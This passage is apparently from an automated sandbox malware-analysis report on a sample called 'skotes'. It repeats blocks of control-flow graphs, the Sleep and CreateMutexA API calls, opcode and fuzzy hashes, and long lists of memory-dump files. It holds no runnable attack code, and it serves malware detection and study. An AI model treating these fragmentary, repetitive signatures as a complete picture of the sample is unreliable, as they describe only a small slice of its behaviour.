                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748240665.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748257722.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748271446.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748271446.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748315030.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748328600.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748341677.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748356647.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748371532.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748384236.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: fabb26ff1d72d1d3e86c1a0b7c724065453b63b6401a096d427d773a07d43d79
                                                                                                                                                                                                                                                                • Instruction ID: 1810f8a60dc6e835b357a09714634eca453fec4742421f917e39ff68bd4779e5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fabb26ff1d72d1d3e86c1a0b7c724065453b63b6401a096d427d773a07d43d79
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 673116317102009BEB189B7CDDC97AEB7A6EBE7310F244619E014973D2D7769984C752

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 124 aaa418-aaa438 128 aaa43a-aaa446 124->128 129 aaa466-aaa482 124->129 130 aaa448-aaa456 128->130 131 aaa45c-aaa463 call abd663 128->131 132 aaa4b0-aaa4cf 129->132 133 aaa484-aaa490 129->133 130->131 134 aaa93f-aaa994 call ad6c6a * 4 Sleep CreateMutexA 130->134 131->129 138 aaa4fd-aaa916 call ab80c0 132->138 139 aaa4d1-aaa4dd 132->139 136 aaa492-aaa4a0 133->136 137 aaa4a6-aaa4ad call abd663 133->137 160 aaa996-aaa998 134->160 161 aaa9a7-aaa9a8 134->161 136->134 136->137 137->132 140 aaa4df-aaa4ed 139->140 141 aaa4f3-aaa4fa call abd663 139->141 140->134 140->141 141->138 160->161 162 aaa99a-aaa9a5 160->162 162->161
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 00AAA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00B03254), ref: 00AAA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1746831215.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746818244.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746831215.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746877793.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746890667.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746942997.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747030114.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747045083.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747067454.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747067454.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747100705.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747116706.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747133193.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747152191.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747170462.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747187044.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747201259.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747717299.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747770840.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747793172.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747837126.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747874251.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747972191.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747993810.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748029577.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748115115.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748132302.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748152837.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748166578.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748181609.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748195716.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748211983.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748227277.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748240665.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748257722.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748271446.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748271446.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748315030.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748328600.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748341677.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748356647.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748371532.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748384236.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: dabf769a75bc31512ec78d3ec828f9393cbd75f51c2bcb6ed47a6184acad81d2
                                                                                                                                                                                                                                                                • Instruction ID: 8ee374e2708e22d015719251141783c004fd73bf0649f86e9d19df7442e90785
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dabf769a75bc31512ec78d3ec828f9393cbd75f51c2bcb6ed47a6184acad81d2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B312A317102009BEB089BBCDDC97AEB7A5EFD6314F204219F014973D6D7755980C762

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 164 aaa54d-aaa56d 168 aaa59b-aaa5b7 164->168 169 aaa56f-aaa57b 164->169 172 aaa5b9-aaa5c5 168->172 173 aaa5e5-aaa604 168->173 170 aaa57d-aaa58b 169->170 171 aaa591-aaa598 call abd663 169->171 170->171 176 aaa944-aaa994 call ad6c6a * 3 Sleep CreateMutexA 170->176 171->168 178 aaa5db-aaa5e2 call abd663 172->178 179 aaa5c7-aaa5d5 172->179 174 aaa632-aaa916 call ab80c0 173->174 175 aaa606-aaa612 173->175 180 aaa628-aaa62f call abd663 175->180 181 aaa614-aaa622 175->181 198 aaa996-aaa998 176->198 199 aaa9a7-aaa9a8 176->199 178->173 179->176 179->178 180->174 181->176 181->180 198->199 200 aaa99a-aaa9a5 198->200 200->199
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 00AAA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00B03254), ref: 00AAA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1746831215.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746818244.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746831215.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746877793.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746890667.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746942997.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747030114.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747045083.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747067454.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747067454.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747100705.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747116706.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747133193.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747152191.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747170462.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747187044.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747201259.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747717299.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747770840.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747793172.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747837126.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747874251.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747972191.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747993810.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748029577.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748115115.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748132302.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748152837.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748166578.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748181609.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748195716.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748211983.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748227277.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748240665.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748257722.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748271446.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748271446.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748315030.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748328600.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748341677.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748356647.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748371532.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748384236.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: 1eeec27556d68fbeece94fa66dc76aa880e50d5c334ce668f145fa52f7307c13
                                                                                                                                                                                                                                                                • Instruction ID: 931d4eb6427d91dcd80a8957a746a7b38671c35ea03a6e0cf4b57886065788e2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1eeec27556d68fbeece94fa66dc76aa880e50d5c334ce668f145fa52f7307c13
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FE315B31B102008BEB08DB7CDDC97ADB7A6EFD6314F248618E015973D2C7369980C756

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 202 aaa682-aaa6a2 206 aaa6d0-aaa6ec 202->206 207 aaa6a4-aaa6b0 202->207 210 aaa71a-aaa739 206->210 211 aaa6ee-aaa6fa 206->211 208 aaa6b2-aaa6c0 207->208 209 aaa6c6-aaa6cd call abd663 207->209 208->209 212 aaa949-aaa994 call ad6c6a * 2 Sleep CreateMutexA 208->212 209->206 216 aaa73b-aaa747 210->216 217 aaa767-aaa916 call ab80c0 210->217 214 aaa6fc-aaa70a 211->214 215 aaa710-aaa717 call abd663 211->215 234 aaa996-aaa998 212->234 235 aaa9a7-aaa9a8 212->235 214->212 214->215 215->210 222 aaa749-aaa757 216->222 223 aaa75d-aaa764 call abd663 216->223 222->212 222->223 223->217 234->235 236 aaa99a-aaa9a5 234->236 236->235
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 00AAA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00B03254), ref: 00AAA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1746831215.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746818244.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746831215.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746877793.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746890667.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746942997.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747030114.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747045083.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747067454.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747067454.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747100705.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747116706.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747133193.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747152191.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747170462.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747187044.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747201259.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747717299.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747770840.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747793172.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747837126.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747874251.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747972191.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747993810.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748029577.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748115115.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748132302.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748152837.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748166578.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748181609.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748195716.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748211983.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748227277.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748240665.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748257722.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748271446.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748271446.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748315030.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748328600.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748341677.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748356647.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748371532.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1748384236.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: e83dc902d2ff4a864ac908cf859af96a8501d9874fa3faf185f72b41cb909416
                                                                                                                                                                                                                                                                • Instruction ID: 532f60ba3ada4362b1ff746400d4e87f6741507116faaf85c2e6e214a8c7d6e2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e83dc902d2ff4a864ac908cf859af96a8501d9874fa3faf185f72b41cb909416
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 773146317102009BEB08DB78DDC9BAEB7FAEBD6310F248618E014D72D2D73A9980C752

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 238 aa9adc-aa9ae8 239 aa9aea-aa9af8 238->239 240 aa9afe-aa9d91 call abd663 call ab7a00 call aa5c10 call aa8b30 call ab8220 call ab7a00 call aa5c10 call aa8b30 call ab8220 238->240 239->240 241 aaa917 239->241 243 aaa953-aaa994 Sleep CreateMutexA 241->243 244 aaa917 call ad6c6a 241->244 250 aaa996-aaa998 243->250 251 aaa9a7-aaa9a8 243->251 244->243 250->251 253 aaa99a-aaa9a5 250->253 253->251
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 00AAA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00B03254), ref: 00AAA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1746831215.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746818244.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746831215.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746877793.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746890667.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1746942997.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747030114.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747045083.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747067454.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747067454.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747100705.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747116706.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747133193.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747152191.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747170462.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1747187044.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
